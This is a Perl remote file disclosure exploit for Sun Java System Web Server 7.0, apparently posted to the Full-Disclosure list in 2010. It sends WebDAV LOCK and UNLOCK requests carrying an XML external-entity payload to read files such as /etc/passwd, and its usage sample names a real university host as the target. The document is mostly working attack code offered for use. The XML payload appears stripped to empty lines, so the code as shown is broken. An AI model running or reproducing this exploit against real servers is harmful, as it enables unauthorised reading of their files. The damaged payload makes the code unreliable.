sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD KTHX #!/usr/bin/perl # aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT # oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo # oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo # oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo # !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !! # MAY/2010 # VERY THANKS TO LSD # # # oO VERiFIED oN Oo # # SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS SERVER 2008 & SunOS 5.10] # SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD # [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE] # RoCKiNG tHA SuRFACE SiNCE 2003 kTHX use IO::Socket; use MIME::Base64; print "//Sun Microsystems Sun Java System Web Server\n"; print "//Remote File Disclosure Exploit\n"; print "//by Kingcope\n"; print "May/2010\n"; if ($#ARGV != 2) { print "usage: perl sunone.pl \n"; print "sample: perl sunone.pl lib7.berkeley.edu /dav /etc/passwd\n"; exit; } $target = $ARGV[0]; $|=1; $remotefile = $ARGV[2]; $folder = $ARGV[1]; $KRADXmL = "\n" ."\n" ."]>\n" ."\n" ."\n" ."\n" ."\n" ."\n" ."\n" ."&RemoteX;\n" ."\n" ."\n" ."\n" ."\n"; $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '80', Proto => 'tcp'); print $sock "LOCK /$folder HTTP/1.1\r\n". "Host: $target\r\n". "Depth: 0\r\n". "Connection: close\r\n". "Content-Type: application/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n". $KRADXmL; $locktoken = ""; while(<$sock>) { if ($_ =~ /^Lock-token:\s(.*)?\r/) { $locktoken = $1; chomp $locktoken; } print; } close($sock); $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '80', Proto => 'tcp'); print $sock "UNLOCK /$folder HTTP/1.1\r\n". "Host: $target\r\n". "Connection: close\r\n". "Lock-token: $locktoken\r\n\r\n"; while(<$sock>) { print; } close($sock); _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/